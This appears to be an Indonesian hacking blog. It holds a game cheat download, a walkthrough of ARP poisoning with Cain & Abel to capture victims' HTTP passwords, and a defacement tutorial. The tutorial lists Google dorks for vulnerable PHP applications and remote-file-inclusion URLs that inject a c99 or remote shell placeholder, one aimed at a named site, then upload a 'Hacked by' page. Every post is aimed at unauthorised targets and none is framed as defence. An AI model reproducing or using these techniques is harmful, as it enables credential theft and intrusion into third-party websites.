ZOMBOY

Enter Slide 2 Title Here

Enter Slide 3 Title Here

Senin, 06 Juni 2011

cheat wh 06-06-11

LANGSUNG AJA.. DI ..TEST WHNYA.. 


1. Buka WH060611.exe
2. Tunggu injeck Nonggol.
3. Buka PointBlank,-
klik cheat yg ada di injector
6. oke2 aja....happy Che*t

Hotkey :
- Insert = On/Off
CREDIT : nstars

DOWNLOAD

Jumat, 08 April 2011

HACK? FACEBOOK? coba pake cara saya..


Chain and Able merupakan sebuah Tool Hacking popular yang sederhana dan mudah digunakan.

Dengan
 Tool Cain ini, kita dapat menangkap lalu lintas paket dari komputer
korban yang terkoneksi internet, tak terkecuali password. Tool inilah
yang dilakukan para hacker untuk melakukan aksi sniffing.

Mari kita kenal lebih dalam Cain & Able ini.

    * Download Chain & Able DOWNLOAD
    * Install Program Chain Able
    * Jalankan Cain

    * Oya, sebelumnya anda harus tau dulu IP adress anda di command prompt (cmd).




    * Nah, setelah itu, di program cain, klik start APR dan start Sniffer seperti pada gambar berikut.



    * Setelah itu klik tab snifing lalu klik kanan dan pilih scan MAC adress,


    * Klik tab ARP di bagian bawah, lalu klik tanda tambah “+” untuk
add, maka akan keluar kotak dialog.



    * Pada kotak kiri klik IP server dan pada kotak kanan klik IP
korban. Lakukan berulang-ulang untuk nge-hack semua IP adress korban
yang ada.
    

    * Setelah selesai maka akan dilakukan proses poisoning terhadap semua IP korban.


    * Untuk hasilnya, silahkan klik tab password pada bagian bawah dan klik HTTP, lihat gambar,


Membaca Hasil :

    * Klik Menu HTTP Pada sidebar kiri.
    * Perhatikan Kolom Client, pastikan itu bukan IP adress anda sendiri.
    * Perhatikan kolom Username dan Password. Sering kita menjumpai
data-data yang bukan password, anda akan mendampatkan password jika sang
 target melakukan login.


Sumber: ME..HACK

Kamis, 08 April 2010

Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com

nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :

http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … 

http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :

http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … 
http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..
Nah setelah itu buadlah sebuad file: index.html
Isi dengan:

Hacked by Nama Kamu

Kemudian upload deh file ke directorynya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Enjoy

Popular Posts

Viewers

Web Counters

Welcome text